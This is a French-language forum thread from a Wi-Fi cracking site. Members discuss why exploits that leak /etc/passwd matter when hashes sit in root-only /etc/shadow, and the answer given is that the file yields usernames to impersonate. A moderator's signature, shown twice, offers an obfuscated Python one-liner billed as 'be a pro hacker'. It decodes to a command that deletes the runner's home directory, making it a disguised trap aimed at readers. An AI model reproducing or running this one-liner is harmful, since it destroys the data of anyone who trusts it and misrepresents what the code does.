Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-08-2012 21:25:20

ronin
Membre Radioactif
Inscription : 08-05-2011
Messages : 82
Site Web

/etc/shadow et les exploits

Bonjour à tous,

Je vois plein d'exploits avec des exemples d'utilisation pour récupérer /etc/passwd
Mais bon j'avais l'impression que la plupart des systèmes utilisaient /etc/shadow qui n'est accessible que par root.

Ces exploits accédant le plus souvent une vulnérabilité qui elle ne tourne pas en temps que root ils ne permettent pas d'accéder à /etc/shadow. Tous ces exploit sont ils beaucoup moins efficaces qu'on le dit ? Et si non, comment accéder à /etc/passwd avec la fonction shadow donne t'elle accès à une serveur ?

Merci d'éclairer ma lanterne

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-08-2012 13:47:13

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : /etc/shadow et les exploits

on a écrit :

ces exploit sont beaucoup moins efficaces

Ta question n'est pas très claire.
Et comme le disait mon père : 'on est un con'.

Tu peux reformuler ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 21-08-2012 13:53:26

ronin
Membre Radioactif
Inscription : 08-05-2011
Messages : 82
Site Web

Re : /etc/shadow et les exploits

Le ficher /etc/passwd ne contient plus les mots de passe depuis des années. Maintenant ils sont dans /etc/shadow qui n'est accessible que par root.

Hors dans plein de descriptif d'exploits on a des exemple de comment récupérer /etc/passwd mais je ne comprends pas à quoi ça sert. Sur que ça donne des infos comme la liste des utilisateurs mais sans les mots de passe ... C'est juste que je me demandait si certaines vulnérabilités publiées n'étaient pas en fait si grave que ça.

Hors Ligne

#4 21-08-2012 17:53:21

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : /etc/shadow et les exploits

Le récupérer peut te servir à récupérer une liste d'utilisateurs à usurper.
(que ce soient des services où des vrais utilisateurs)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 21-08-2012 17:58:09

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : /etc/shadow et les exploits

La manière de le récupérer par contre c'est en contournant des expressions standard smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]